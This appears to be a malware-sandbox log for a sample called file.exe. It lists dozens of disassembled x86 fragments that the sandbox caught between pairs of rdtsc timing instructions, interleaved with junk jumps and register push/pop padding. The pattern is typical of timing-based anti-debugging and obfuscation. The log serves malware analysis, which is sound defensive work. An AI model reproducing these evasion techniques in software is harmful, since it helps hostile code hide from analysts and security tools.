Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54C031F second address: 54C0388 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E810FCBB9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F5E810FCBACh 0x00000011 or cl, 00000078h 0x00000014 jmp 00007F5E810FCBABh 0x00000019 popfd 0x0000001a movzx eax, bx 0x0000001d popad 0x0000001e push eax 0x0000001f pushad 0x00000020 movzx eax, bx 0x00000023 jmp 00007F5E810FCBADh 0x00000028 popad 0x00000029 xchg eax, ebp 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d mov ecx, edx 0x0000002f call 00007F5E810FCBAFh 0x00000034 pop eax 0x00000035 popad 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54C0388 second address: 54C03B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F5E8080F364h 0x00000009 adc ch, 00000068h 0x0000000c jmp 00007F5E8080F35Bh 0x00000011 popfd 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54C03B1 second address: 54C03C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov ebp, esp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F5E810FCBABh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5470038 second address: 547003E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 547003E second address: 54700DF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E810FCBB3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d pushad 0x0000000e push esi 0x0000000f jmp 00007F5E810FCBABh 0x00000014 pop esi 0x00000015 call 00007F5E810FCBB9h 0x0000001a pushfd 0x0000001b jmp 00007F5E810FCBB0h 0x00000020 xor cx, DF08h 0x00000025 jmp 00007F5E810FCBABh 0x0000002a popfd 0x0000002b pop ecx 0x0000002c popad 0x0000002d and esp, FFFFFFF8h 0x00000030 jmp 00007F5E810FCBAFh 0x00000035 xchg eax, ecx 0x00000036 jmp 00007F5E810FCBB6h 0x0000003b push eax 0x0000003c push eax 0x0000003d push edx 0x0000003e push eax 0x0000003f push edx 0x00000040 jmp 00007F5E810FCBADh 0x00000045 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54700DF second address: 54700F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E8080F361h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54700F4 second address: 5470128 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, bx 0x00000006 jmp 00007F5E810FCBB3h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F5E810FCBB5h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5470128 second address: 547012E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 547012E second address: 5470132 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5470132 second address: 5470163 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E8080F363h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F5E8080F365h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5470163 second address: 5470209 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F5E810FCBB7h 0x00000009 add ecx, 6EC672DEh 0x0000000f jmp 00007F5E810FCBB9h 0x00000014 popfd 0x00000015 movzx eax, di 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push eax 0x0000001c pushad 0x0000001d mov bx, si 0x00000020 pushfd 0x00000021 jmp 00007F5E810FCBB4h 0x00000026 sub ecx, 547D3208h 0x0000002c jmp 00007F5E810FCBABh 0x00000031 popfd 0x00000032 popad 0x00000033 xchg eax, ebx 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 jmp 00007F5E810FCBABh 0x0000003c pushfd 0x0000003d jmp 00007F5E810FCBB8h 0x00000042 sbb ah, FFFFFF98h 0x00000045 jmp 00007F5E810FCBABh 0x0000004a popfd 0x0000004b popad 0x0000004c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5470209 second address: 547020F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 547020F second address: 5470213 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5470213 second address: 5470224 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebx, dword ptr [ebp+10h] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5470224 second address: 547023C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E810FCBB4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 547023C second address: 5470242 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5470242 second address: 5470246 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5470246 second address: 547024A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 547024A second address: 54702EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 jmp 00007F5E810FCBB6h 0x0000000e mov dword ptr [esp], esi 0x00000011 pushad 0x00000012 mov eax, 5866265Dh 0x00000017 mov dx, si 0x0000001a popad 0x0000001b mov esi, dword ptr [ebp+08h] 0x0000001e pushad 0x0000001f mov edi, ecx 0x00000021 mov bx, si 0x00000024 popad 0x00000025 xchg eax, edi 0x00000026 pushad 0x00000027 jmp 00007F5E810FCBB6h 0x0000002c push eax 0x0000002d call 00007F5E810FCBB1h 0x00000032 pop ecx 0x00000033 pop ebx 0x00000034 popad 0x00000035 push eax 0x00000036 pushad 0x00000037 jmp 00007F5E810FCBADh 0x0000003c mov bx, cx 0x0000003f popad 0x00000040 xchg eax, edi 0x00000041 pushad 0x00000042 mov ch, A2h 0x00000044 push eax 0x00000045 push edx 0x00000046 pushfd 0x00000047 jmp 00007F5E810FCBABh 0x0000004c sbb al, 0000003Eh 0x0000004f jmp 00007F5E810FCBB9h 0x00000054 popfd 0x00000055 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54702EF second address: 547034B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 test esi, esi 0x00000009 jmp 00007F5E8080F35Ch 0x0000000e je 00007F5EF22CD667h 0x00000014 pushad 0x00000015 mov ecx, 5DEDA44Dh 0x0000001a mov si, 3849h 0x0000001e popad 0x0000001f cmp dword ptr [esi+08h], DDEEDDEEh 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 pushfd 0x0000002a jmp 00007F5E8080F361h 0x0000002f add esi, 2A7F8ED6h 0x00000035 jmp 00007F5E8080F361h 0x0000003a popfd 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 547034B second address: 5470350 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5470350 second address: 547037A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E8080F367h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F5EF22CD616h 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 mov cx, dx 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 547037A second address: 54703A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E810FCBAAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edx, dword ptr [esi+44h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F5E810FCBB7h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54703A4 second address: 54703CE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F5E8080F35Fh 0x00000008 pop eax 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e or edx, dword ptr [ebp+0Ch] 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 call 00007F5E8080F35Ah 0x00000019 pop ecx 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54703CE second address: 5470406 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx esi, di 0x00000006 mov cx, di 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c test edx, 61000000h 0x00000012 jmp 00007F5E810FCBB5h 0x00000017 jne 00007F5EF2BBAE39h 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 mov ebx, 2B0FA58Eh 0x00000025 push ebx 0x00000026 pop eax 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5470406 second address: 547043C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E8080F360h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test byte ptr [esi+48h], 00000001h 0x0000000d jmp 00007F5E8080F360h 0x00000012 jne 00007F5EF22CD5C9h 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b mov ax, dx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 547043C second address: 5470441 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54608DD second address: 54608FE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E8080F35Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F5E8080F35Dh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54608FE second address: 5460949 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E810FCBB1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F5E810FCBB1h 0x0000000f xchg eax, ebp 0x00000010 pushad 0x00000011 mov dx, cx 0x00000014 mov edi, eax 0x00000016 popad 0x00000017 mov ebp, esp 0x00000019 jmp 00007F5E810FCBB2h 0x0000001e and esp, FFFFFFF8h 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5460949 second address: 546094E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 546094E second address: 54609AE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E810FCBAFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007F5E810FCBB6h 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push esi 0x00000014 pop ebx 0x00000015 pushfd 0x00000016 jmp 00007F5E810FCBB8h 0x0000001b jmp 00007F5E810FCBB5h 0x00000020 popfd 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54609AE second address: 54609B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54609B4 second address: 54609B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54609B8 second address: 54609D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F5E8080F361h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54609D6 second address: 54609EB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E810FCBB1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54609EB second address: 5460A56 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E8080F361h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a pushad 0x0000000b mov bh, ah 0x0000000d mov al, dh 0x0000000f popad 0x00000010 push eax 0x00000011 pushad 0x00000012 call 00007F5E8080F361h 0x00000017 pushad 0x00000018 popad 0x00000019 pop ecx 0x0000001a push edi 0x0000001b call 00007F5E8080F35Ah 0x00000020 pop ecx 0x00000021 pop ebx 0x00000022 popad 0x00000023 xchg eax, esi 0x00000024 jmp 00007F5E8080F35Eh 0x00000029 mov esi, dword ptr [ebp+08h] 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007F5E8080F367h 0x00000033 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5460A56 second address: 5460ACE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, C73Ah 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov ebx, 00000000h 0x00000011 jmp 00007F5E810FCBACh 0x00000016 test esi, esi 0x00000018 pushad 0x00000019 mov eax, 43A97F8Dh 0x0000001e pushfd 0x0000001f jmp 00007F5E810FCBAAh 0x00000024 add cl, FFFFFFA8h 0x00000027 jmp 00007F5E810FCBABh 0x0000002c popfd 0x0000002d popad 0x0000002e je 00007F5EF2BC249Eh 0x00000034 jmp 00007F5E810FCBB6h 0x00000039 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000040 pushad 0x00000041 mov ebx, ecx 0x00000043 mov ax, D3D9h 0x00000047 popad 0x00000048 mov ecx, esi 0x0000004a push eax 0x0000004b push edx 0x0000004c pushad 0x0000004d pushad 0x0000004e popad 0x0000004f mov edx, 23643402h 0x00000054 popad 0x00000055 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5460ACE second address: 5460B61 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E8080F368h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F5EF22D4C0Fh 0x0000000f pushad 0x00000010 mov bx, si 0x00000013 pushfd 0x00000014 jmp 00007F5E8080F35Ah 0x00000019 and cl, FFFFFFC8h 0x0000001c jmp 00007F5E8080F35Bh 0x00000021 popfd 0x00000022 popad 0x00000023 test byte ptr [76FB6968h], 00000002h 0x0000002a pushad 0x0000002b mov cl, 29h 0x0000002d pushfd 0x0000002e jmp 00007F5E8080F361h 0x00000033 add al, FFFFFFE6h 0x00000036 jmp 00007F5E8080F361h 0x0000003b popfd 0x0000003c popad 0x0000003d jne 00007F5EF22D4BCBh 0x00000043 push eax 0x00000044 push edx 0x00000045 pushad 0x00000046 call 00007F5E8080F363h 0x0000004b pop ecx 0x0000004c mov ch, bl 0x0000004e popad 0x0000004f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5460B61 second address: 5460BA5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, edx 0x00000005 push ebx 0x00000006 pop esi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov edx, dword ptr [ebp+0Ch] 0x0000000d pushad 0x0000000e push edx 0x0000000f pushfd 0x00000010 jmp 00007F5E810FCBB0h 0x00000015 sub ax, 2518h 0x0000001a jmp 00007F5E810FCBABh 0x0000001f popfd 0x00000020 pop esi 0x00000021 popad 0x00000022 xchg eax, ebx 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007F5E810FCBACh 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5460BA5 second address: 5460BAB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5460BAB second address: 5460BD4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E810FCBAEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jmp 00007F5E810FCBB1h 0x00000010 push eax 0x00000011 push edx 0x00000012 push esi 0x00000013 pop ebx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5460BD4 second address: 5460C01 instructions: 0x00000000 rdtsc 0x00000002 call 00007F5E8080F35Ah 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b xchg eax, ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push esi 0x00000010 pop edi 0x00000011 jmp 00007F5E8080F366h 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5460C01 second address: 5460C3E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, dx 0x00000006 mov di, AF80h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push ecx 0x0000000e jmp 00007F5E810FCBB4h 0x00000013 mov dword ptr [esp], ebx 0x00000016 jmp 00007F5E810FCBB0h 0x0000001b push dword ptr [ebp+14h] 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 mov cl, C7h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5460C3E second address: 5460C7C instructions: 0x00000000 rdtsc 0x00000002 mov esi, edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 mov dx, E6E6h 0x0000000b jmp 00007F5E8080F367h 0x00000010 popad 0x00000011 popad 0x00000012 push dword ptr [ebp+10h] 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F5E8080F365h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5460C7C second address: 5460C8C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5E810FCBACh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5460C8C second address: 5460C90 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5460CD1 second address: 5460D00 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E810FCBB5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a jmp 00007F5E810FCBAEh 0x0000000f pop ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5460D00 second address: 5460D04 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5460D04 second address: 5460D0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5460D0A second address: 5460D19 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5E8080F35Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5460D19 second address: 5460D1D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5460D1D second address: 5460D8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov esp, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F5E8080F35Bh 0x00000011 sub cx, E44Eh 0x00000016 jmp 00007F5E8080F369h 0x0000001b popfd 0x0000001c pushfd 0x0000001d jmp 00007F5E8080F360h 0x00000022 adc cl, FFFFFFC8h 0x00000025 jmp 00007F5E8080F35Bh 0x0000002a popfd 0x0000002b popad 0x0000002c pop ebp 0x0000002d push eax 0x0000002e push edx 0x0000002f jmp 00007F5E8080F365h 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5460D8C second address: 5460D92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5460D92 second address: 5460D96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5470D83 second address: 5470DC8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E810FCBABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F5E810FCBB6h 0x0000000f mov ebp, esp 0x00000011 pushad 0x00000012 mov eax, 335B0989h 0x00000017 popad 0x00000018 pop ebp 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c mov ax, dx 0x0000001f call 00007F5E810FCBADh 0x00000024 pop esi 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5470A66 second address: 5470B01 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, bx 0x00000006 pushfd 0x00000007 jmp 00007F5E8080F363h 0x0000000c adc eax, 7F11A4AEh 0x00000012 jmp 00007F5E8080F369h 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b xchg eax, ebp 0x0000001c jmp 00007F5E8080F35Eh 0x00000021 push eax 0x00000022 pushad 0x00000023 pushfd 0x00000024 jmp 00007F5E8080F361h 0x00000029 and ax, C396h 0x0000002e jmp 00007F5E8080F361h 0x00000033 popfd 0x00000034 mov ch, 08h 0x00000036 popad 0x00000037 xchg eax, ebp 0x00000038 pushad 0x00000039 movsx edx, cx 0x0000003c push eax 0x0000003d pushad 0x0000003e popad 0x0000003f pop ebx 0x00000040 popad 0x00000041 mov ebp, esp 0x00000043 push eax 0x00000044 push edx 0x00000045 pushad 0x00000046 jmp 00007F5E8080F35Fh 0x0000004b pushad 0x0000004c popad 0x0000004d popad 0x0000004e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5470B01 second address: 5470B0A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, 7618h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54F00BB second address: 54F00C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54F00C1 second address: 54F00F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E810FCBB3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F5E810FCBB5h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54F00F2 second address: 54F00F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54F00F8 second address: 54F00FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54F00FC second address: 54F0121 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a mov ebx, esi 0x0000000c pushad 0x0000000d mov ax, 0EEDh 0x00000011 mov ax, ACE9h 0x00000015 popad 0x00000016 popad 0x00000017 xchg eax, ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F5E8080F35Bh 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54F0121 second address: 54F0127 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54E0435 second address: 54E04C0 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F5E8080F35Eh 0x00000008 xor cl, 00000068h 0x0000000b jmp 00007F5E8080F35Bh 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007F5E8080F366h 0x0000001a or si, 5BC8h 0x0000001f jmp 00007F5E8080F35Bh 0x00000024 popfd 0x00000025 mov ah, 1Dh 0x00000027 popad 0x00000028 popad 0x00000029 push eax 0x0000002a jmp 00007F5E8080F362h 0x0000002f xchg eax, ebp 0x00000030 pushad 0x00000031 call 00007F5E8080F35Eh 0x00000036 movzx eax, bx 0x00000039 pop edi 0x0000003a mov eax, 123D11B3h 0x0000003f popad 0x00000040 mov ebp, esp 0x00000042 pushad 0x00000043 pushad 0x00000044 mov cl, CDh 0x00000046 popad 0x00000047 popad 0x00000048 pop ebp 0x00000049 push eax 0x0000004a push edx 0x0000004b push eax 0x0000004c push edx 0x0000004d push eax 0x0000004e push edx 0x0000004f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54E04C0 second address: 54E04C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54E04C4 second address: 54E04C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54E04C8 second address: 54E04CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
